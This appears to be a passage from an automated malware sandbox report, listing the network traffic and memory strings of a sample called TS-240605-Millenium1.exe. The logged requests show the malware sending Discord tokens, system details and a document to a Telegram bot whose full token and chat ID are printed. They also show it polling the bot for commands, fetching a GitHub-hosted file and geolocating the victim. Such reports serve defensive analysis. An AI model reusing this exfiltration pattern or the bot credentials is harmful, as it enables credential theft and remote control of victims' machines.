NID=514=CbNGde4uPsMuHjhUahG7Gu93zHQxj5m4ogfTpQcwvgyV-QaM_8Jn4VY2LeLIWTl6oLCfc6EGVpX4T7p5p6K0OJL01GFc4o4ljhFfRKmg4I-BHiFnFTqVEEcJ0tDKCp3Xzs8YC4HjEGgip-MGRb_DAAOaRvTkeR9yBl7q4oppoG8; expires=Thu, 05-Dec-2024 01:56:40 GMT; path=/; domain=.google.com; HttpOnlyData Raw: 1f 8b 08 00 00 00 00 00 02 ff cd 7c 69 77 db b8 d2 e6 f7 fc 0a 9a 99 ab 88 c7 b4 44 52 bb 64 da e3 38 ce d2 37 e9 a4 e3 f4 72 db ed f1 0b 92 90 c4 98 8b 4c 52 b6 15 5b ff 7d 9e 02 b8 49 56 ba fb ed 99 33 67 9c 58 22 80 02 50 1b 0a 55 05 d0 87 7b 5e ec 66 ab 05 57 e6 59 18 1c 1d d2 a7 e2 67 3c 4c dd 78 c1 6d 55 15 05 02 b0 d5 Data Ascii: \|iwDRd87rLR[}IV3gX"PU{^fWYg<LxmU
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Jun 2024 01:56:50 GMTExpires: -1Cache-Control: private, max-age=0Content-Type: text/html; charset=ISO-8859-1Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-An7JMPqZmmjywSuMTUczRw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hpP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Encoding: gzipServer: gwsContent-Length: 8484X-XSS-Protection: 0X-Frame-Options: SAMEORIGINSet-Cookie: 1P_JAR=2024-06-05-01; expires=Fri, 05-Jul-2024 01:56:50 GMT; path=/; domain=.google.com; SecureSet-Cookie: AEC=AQTF6HzDL0BjW3Zk2wmBbdU3MXAt8fPxQQ_WnQ8i5rULsv9QOgDG3Z4FQg; expires=Mon, 02-Dec-2024 01:56:50 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=laxSet-Cookie: NID=514=R5bSnjClrfCueKu9bBCrQU33sXXP7jjcqJXzSJxURWqdaL2SrYCiBQ6QVuVhx1R_rSRrRove5W9Ea1vEKV1XsDKi_sc9RelRnnT_sBssk2RlIy-C-OOJEfWykK7Szx6S7gJMeJDEy3KzSKkkt97Qr70E2jNK-vvRR8-omBVKiaA; expires=Thu, 05-Dec-2024 01:56:50 GMT; path=/; domain=.google.com; HttpOnlyData Raw: 1f 8b 08 00 00 00 00 00 02 ff cd 7c 7b 7b db b6 d2 e7 ff f9 14 34 b3 47 11 1f d3 12 49 dd 25 d3 5e c7 71 2e 3d 49 93 c6 69 4f 5b d7 eb 17 24 21 89 31 2f 32 49 d9 56 6c 7d f7 fd 0d c0 9b 64 a5 ed db dd 67 9f 4d 1b 9b 04 06 83 b9 61 30 33 00 73 b8 e7 c5 6e b6 5a 70 65 9e 85 c1 d1 21 fd 54 fc 8c 87 a9 1b 2f b8 ad aa e2 85 00 6c 75 Data Ascii: \|{{4GI%^q.=IiO[$!1/2IVl}dgMa03snZpe!T/lu
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Jun 2024 01:57:07 GMTExpires: -1Cache-Control: private, max-age=0Content-Type: text/html; charset=ISO-8859-1Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-b41Ni5nQpr_ukMwRTjeo6g' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hpP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Encoding: gzipServer: gwsContent-Length: 8452X-XSS-Protection: 0X-Frame-Options: SAMEORIGINSet-Cookie: AEC=AQTF6HzwyDnnBZT3MJtaoyp0VqWUKf8HmHAKViz_1V-lJV09jizrkLvTcJc; expires=Mon, 02-Dec-2024 01:57:07 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=laxSet-Cookie: NID=514=ZKVoyvXbDOkf_5MfAkgWqLQfedWI8bq4aK17jtJLDoFm3vZ0KRFwixFpemSL8gbUXVuvQYfVm1osSoyvy45AkkQhmZVEQ1OdyguLCxESezCWnQhNbtdlgzlWT5ZRVGREMKLnuTF5SHqSe1yCC0n1Yp149vsh8H1JXBY5yFEZUAQ; expires=Thu, 05-Dec-2024 01:57:07 GMT; path=/; domain=.google.com; HttpOnlyData Raw: 1f 8b 08 00 00 00 00 00 02 ff cd 7c 79 7b db 36 b3 ef ff f9 14 34 7b 5e 45 7c 4c 4b a4 f6 c5 b4 af e3 38 4b 4f b6 c6 e9 f2 d6 f5 f5 01 49 48 62 cc cd 24 65 5b b1 f5 dd ef 6f 00 6e 92 95 b6 a7 e7 3e f7 b9 69 63 93 c0 00 98 0d 83 99 c1 30 87 7b 6e e4 64 ab 98 2b 8b 2c f0 8f 0e e9 a7 e2 65 3c 48 9d 28 e6 96 aa 8a 17 02 b0 d4 45 96 c5 93 76 3b 75 16 3c 60 ad 28 99 b7 7f e5 f6 27 36 e7 aa e2 b3 70 6e a9 3c 54 31 03 67 ee d1 61 c0 33 a6 38 51 98 f1 30 b3 d4 73 ce 12 67 a1 64 0b ae dc 45 89 ef 3e 4f 15 2f 9c 45 49 c0 32 2f 0a 75 bc 38 fe d2 f5 c2 b9 72 c7 ed 18 33 a6 68 0b e4 ef 5b cf e5 51 aa b0 d0 55 82 28 e1 2d e5 75 14 cd 7d e0 cb 52 25 60 e1 4a 49 Data Ascii: \|y{64{^E\|LK8KOIHb$e[on>ic0{nd+,e<H(Ev;u<`('6pn<T1ga38Q0sgdE>O/EI2/u8r3h[QU(-u}R%`JI

Source: global traffic	HTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendMessage?chat_id=6024388590&text=%F0%9F%92%8EDiscord%20tokens:%0A HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendMessage?chat_id=6024388590&text=%0A%F0%9F%96%A5Computer%20info:%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AComputer%20name:%20992547%0AUser%20name:%20user%0ASystem%20time:%202024-06-04%209:56:51%20pm%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20ON2Z3HY%0ARAM:%204095%20MB%0AHWID:%20E63B102745%0A%0A%F0%9F%9B%A1Security:%0AInstalled%20antivirus:%20Windows%20Defender.%0AStarted%20as%20admin:%20True HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendMessage?chat_id=6024388590&text=%E2%9A%A1%EF%B8%8FBot%20connected:%0AUsername:%20user,%20Location:%20United%20States%20[US],%20Killeen,%20ID:%206476%0A%E2%84%B9%EF%B8%8FSend%20%22/6476*help%22%20to%20see%20the%20command%20list%0A%F0%9F%92%8EVersion:%202.8 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendMessage?chat_id=6024388590&text=%E2%9A%A1%EF%B8%8FBot%20connected:%0AUsername:%20user,%20Location:%20United%20States%20[US],%20Killeen,%20ID:%205169%0A%E2%84%B9%EF%B8%8FSend%20%22/5169*help%22%20to%20see%20the%20command%20list%0A%F0%9F%92%8EVersion:%202.8 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.google.comUser-Agent: python-requests/2.28.1Accept-Encoding: gzip, deflate, brAccept: /Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.1
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.google.comUser-Agent: python-requests/2.28.1Accept-Encoding: gzip, deflate, brAccept: /Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.google.comUser-Agent: python-requests/2.28.1Accept-Encoding: gzip, deflate, brAccept: /Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7006262545:AAG_Oybxah5yJgAPFw9HTnZfJtepO5xBob8/sendDocument HTTP/1.1Host: api.telegram.orgAccept-Encoding: identityContent-Length: 3572User-Agent: python-urllib3/2.2.1Content-Type: multipart/form-data; boundary=0b4ba1c968e585ef344eda942b799b23

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 14Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxStrict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 1; mode=blockContent-Type: text/plain; charset=utf-8X-GitHub-Request-Id: 75CC:35BBD2:52803C:5BA726:665FC5CCAccept-Ranges: bytesDate: Wed, 05 Jun 2024 01:56:29 GMTVia: 1.1 varnishX-Served-By: cache-dfw-kdfw8210032-DFWX-Cache: MISSX-Cache-Hits: 0X-Timer: S1717552590.719037,VS0,VE51Vary: Authorization,Accept-Encoding,OriginAccess-Control-Allow-Origin: *Cross-Origin-Resource-Policy: cross-originX-Fastly-Request-ID: 28047bd42688dd2b3620861dd56f3b38dfd0a8f4Expires: Wed, 05 Jun 2024 02:01:29 GMTSource-Age: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 14Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxStrict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 1; mode=blockContent-Type: text/plain; charset=utf-8X-GitHub-Request-Id: 75CC:35BBD2:52803C:5BA726:665FC5CCAccept-Ranges: bytesDate: Wed, 05 Jun 2024 01:56:43 GMTVia: 1.1 varnishX-Served-By: cache-dfw-kdfw8210154-DFWX-Cache: HITX-Cache-Hits: 1X-Timer: S1717552604.840955,VS0,VE1Vary: Authorization,Accept-Encoding,OriginAccess-Control-Allow-Origin: *Cross-Origin-Resource-Policy: cross-originX-Fastly-Request-ID: 4742bced582b85afb50d1846fe4da481dcf7d296Expires: Wed, 05 Jun 2024 02:01:43 GMTSource-Age: 14
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 14Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxStrict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 1; mode=blockContent-Type: text/plain; charset=utf-8X-GitHub-Request-Id: 75CC:35BBD2:52803C:5BA726:665FC5CCAccept-Ranges: bytesDate: Wed, 05 Jun 2024 01:56:59 GMTVia: 1.1 varnishX-Served-By: cache-dfw-kdfw8210171-DFWX-Cache: HITX-Cache-Hits: 1X-Timer: S1717552620.528511,VS0,VE2Vary: Authorization,Accept-Encoding,OriginAccess-Control-Allow-Origin: *Cross-Origin-Resource-Policy: cross-originX-Fastly-Request-ID: 0d3e5cea8750e4a4fe24e92cb76efd93e7b15268Expires: Wed, 05 Jun 2024 02:01:59 GMTSource-Age: 30
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 14Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxStrict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 1; mode=blockContent-Type: text/plain; charset=utf-8X-GitHub-Request-Id: 75CC:35BBD2:52803C:5BA726:665FC5CCAccept-Ranges: bytesDate: Wed, 05 Jun 2024 01:57:16 GMTVia: 1.1 varnishX-Served-By: cache-dfw-kdfw8210083-DFWX-Cache: HITX-Cache-Hits: 1X-Timer: S1717552637.562970,VS0,VE2Vary: Authorization,Accept-Encoding,OriginAccess-Control-Allow-Origin: *Cross-Origin-Resource-Policy: cross-originX-Fastly-Request-ID: db6fc59a4e8288af3e1783667487eed2b0b3d419Expires: Wed, 05 Jun 2024 02:02:16 GMTSource-Age: 47

Source: based.exe, 00000007.00000003.1876198467.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digi
Source: based.exe, 00000007.00000003.1876198467.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digiCi
Source: TS-240605-Millenium1.exe, 00000000.00000003.1833690751.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1878784619.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert
Source: TS-240605-Millenium1.exe, 00000000.00000003.1833690751.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868701636.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1878784619.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000002.2150147759.00000235B9F7E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1923356570.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.co
Source: based.exe, 00000007.00000003.1878784619.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.coCi
Source: hacn.exe, 00000006.00000003.1868701636.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.coR
